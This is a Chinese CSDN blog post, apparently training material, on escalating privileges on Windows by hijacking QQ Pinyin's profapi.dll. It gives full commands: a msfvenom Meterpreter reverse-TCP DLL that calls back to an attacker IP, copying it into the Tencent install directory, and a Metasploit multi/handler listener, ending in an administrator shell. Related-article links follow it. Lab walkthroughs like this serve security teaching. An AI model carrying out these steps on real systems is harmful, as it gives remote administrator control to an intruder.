Windows第三方软件提权-QQpinyin

于 2024-08-15 14:24:18 发布
阅读量201 收藏 3
点赞数 2
文章标签: 大数据 网教盟 第三方提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A19911511842/article/details/141221329
版权

Windows第三方软件提权--dll劫持--QQPinyin-profapi.dll

通过各种手段拿到webshell,whoami查看用户权限,发现是普通用户(apache),尝试提权

通过命令:wmic process get name,executablepath 查看电脑的相关进程以及可执行路径

发现存在QQ拼音的服务进程,该服务可能存在dll劫持漏洞,盲猜一波安装路径(腾讯软件默认安装路径为C:\Program Files (x86)\Tencent)

果然在这里

使用kali的msfvenom制作反弹shell的dll木马(kali IP:192.168.188.177):msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.188.177 LPORT=6060 -f dll > shell.dll

上传到靶机服务器(文件位置:C:\AppServ\www\shell.dll)

修改dll文件名字并复制到QQ拼音的安装目录:

在QQ拼音安装目录执行:copy C:\\AppServ\\www\\shell.dll profapi.dll

Kali的msfconsole中使用相关paylaod模块开启监听:

root@kali:~# msfconsole

...

...

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LHOST 192.168.188.177

LHOST => 192.168.188.177

msf5 exploit(multi/handler) > set LPORT 6060

LPORT => 6060

msf5 exploit(multi/handler) > run

靶机运行卸载程序:uninst.exe

成功连接,权限为管理员,提权成功

方班网安人才教育服务中心
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第三方模块远程注入到软件中引发软件异常的若干实战案例分享
dvlinker的技术专栏
11-22 8058
本文详细分享第三方模块远程注入到软件中引发软件异常的若干实战案例。
第三方模块远程注入到C++程序中引发软件异常的若干实战案例分享
dvlinker的技术专栏
07-27 6264
第三方模块远程注入到软件中引发软件异常的若干实战案例分享
Android系统内置第三方输入法
热门推荐
Ryan的博客
04-14 1万+
Android系统内置第三方输入法
android百度输入法源码,Android内置第三方输入法
weixin_39722563的博客
05-26 1921
Android内置第三方输入法本篇讲诉如何再安卓源码中内置第三方输入法,并设为默认输入法启动,以及过程中可能引起的一些其他系统Bug处理:内置输入法关联源码各第三方输入法ID以讯飞为例内置方法设置默认首选第三方输入法引起的系统问题一、内置输入法关联源码frameworks/base/packages/SettingsProvider/res/values/defaults.xmlframework...
Android内置第三方输入法
MEMO的博客
10-30 4871
Android内置第三方输入法本篇讲诉如何再安卓源码中内置第三方输入法,并设为默认输入法启动,以及过程中可能引起的一些其他系统Bug处理: 内置输入法关联源码 各第三方输入法ID 以讯飞为例内置方法 设置默认首选第三方输入法引起的系统问题 一、内置输入法关联源码 frameworks/base/packages/SettingsProvider/res/values/defaults.xml
windows被迫重装系统| 数据恢复 | 启动盘 PE盘 | 批量软件安装
qq_44710985的博客
08-01 761
所有使用的软件都不唯一,只要达到目的就好。唉,心累。经过了此次事件之后,虽然丢了很多的文件,但是也给各位提个醒,文件一定要多端备份!!!至少要三端备份!!!唉。。。我就开始各种小心翼翼,把本地的文件在各种网盘里都备份了。什么百度云,阿里云,坚果云,OneDrive,有道。。。。要是系统再坏了,即使什么都坏了,只要这些公司没被轰炸,咱就没事🤡.........
原生Android7.1 添加第三方输入法
qq_23851665的博客
09-10 2957
平台:msm8953_64 Android 7.1.2 Ubuntu 16.04 第一步,获取输入输入法 (1)到讯飞输入法官网下载xxx.apk文件 (2)在packages/apps 目录下新建FlyIMEjackw目录,该目录名字后面要用到 (3)将输入法xxx.apk文件拷贝到FlyIMEjackw目录 (4) mv xxx.apk xxx.zip     unzip xxx.zip ...
常用软件官方下载地址
m0_65470193的博客
12-26 2334
http://down.sandai.net/mini/ThunderMiniInstall1.4.2.146.exe(2.86m)http://dl_dir.qq.com/invc/qqwubi/QQWubi_Setup_10_108.exe(5.44m)http://dl_dir.qq.com/invc/qqimage/QQImage_Setup_10_260.exe(10.3m 腾讯停止维护,不能上传)http://download.microsoft.com/download/8/6/1/86...
android+编译+输入法+apk,原生Android7.1 添加第三方输入法
weixin_35869861的博客
05-26 776
平台:msm8953_64Android 7.1.2Ubuntu 16.04第一步,获取输入输入法(1)到讯飞输入法官网下载xxx.apk文件(2)在packages/apps 目录下新建FlyIMEjackw目录,该目录名字后面要用到(3)将输入法xxx.apk文件拷贝到FlyIMEjackw目录(4) mv xxx.apk xxx.zipunzip xxx.zip第二步 将输入法加入到系统编译...
QQPinyin_Setup
10-26
QQPinyin_Setup_4.6.2063.400.exe 是个很好的软件,上传它方便别人下载
QQPinyin_Setup_1.3.1265.400.
02-03
QQPinyin_Setup_1.3.1265.400.
QQ拼音输入法纯净版 v1.1.1233.400.zip
07-13
QQ拼音输入法2013纯净版1.1正式发布。产品理念:回归输入本质,让您的输入体验更加轻松愉悦。简约设计,摒弃冗余,永无弹窗广告,还您一个安静无扰的输入体验。 纯净版就相当于简洁版,占资源较少,但同时也少了些...
QQPinyin.part1.rar
11-09
3. 按顺序选择第一个分卷文件(例如,QQPinyin_Setup_23_614.part01.rar)进行解压,其他分卷文件会自动合并并解压。 4. 完成解压后,运行解压出的安装程序,按照提示进行安装。 5. 安装完成后,可以在系统设置中将...
QQPinyin_Setup.exe
01-17
该输入法支持拼音,五笔等。就和咱们平常用的搜狗输入法类型,毕竟实用,并作为日常工具来说,是工作,学习的必备软件
Spark MLlib 特征工程(上)
08-14 1454
特征选择的动机,在于提取与预测标的关联度更高的特征,从而精简模型尺寸、提升模型泛化能力。特征选择可以从两方面入手,业务出发的专家经验和基于数据的统计分析。归一化的目的,在于去掉不同特征之间量纲的影响,避免量纲不一致而导致的梯度下降震荡、模型收敛效率低下等问题。归一化的具体做法,是把不同特征都缩放到同一个值域。在这方面,Spark MLlib 提供了多种归一化方法供开发者选择。
软考高级第四版备考---第39天(数据管理)
u013136284的专栏
08-12 715
5.2数据安全管理:数据安全管理是在数据安全标准与策略的指导下,通过对数据访问的授权、分类分级的控制、监控数据的访问等进行数据安全的管理工作,满足数据安全的业务需要和监管需求,实现组织内部对数据生存周期的数据安全管理。6.4数据质量提升:数据质量提升是对数据质量分析的结果,制定、实施数据质量改进方案,包括错误数据更正、业务流程优化、应用系统问题修复等,并制定数据质量问题的预防方案,确保数据质量改进的成果得到有效保持。
ElasticSearch文档数据关联关系处理
最新发布
qq_44027353的博客
08-15 512
再更新操作时,对象类型和嵌套对象nested方式有一个问题,因为根对象和嵌套对象本质上它们还是存在一个文档中的,每次更新时就可以需要重新索引整个文档。ES提供了父子关联关系,通过维护parent/child的关系,分离它们,使父文档和子文档是两个独立的文档,更新其中一个文档不会影响另一个文档。创建子文档时,必须通过routing指定父文档id,保证父子文档在一个shard中,提高join查询性能。user字段如果保存的是一个对象数组,在搜索时添加两个查询条件,数组中两个对象分别满足一个条件。
从零开始构建霸王餐返利APP的技术路线与挑战
微赚开发者技术分享博客
08-12 1454
构建霸王餐返利APP是一个复杂的过程,涉及到技术选型、系统设计、功能实现和用户体验等多个方面。通过精心设计的技术路线和对挑战的克服,可以打造出一个成功的产品。本文著作权归聚娃科技微赚淘客系统开发者团队,转载请注明出处!
谷粒商城实战笔记-175~177-商城业务-检索服务-检索查询接口开发
epitomizelu的专栏
08-13 735
搜索页面搭建完成之后,点击搜索按钮,发送参数给后台服务,后台服务根据参数从Elasticsearch中查询符合条件的数据,返回给前端。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值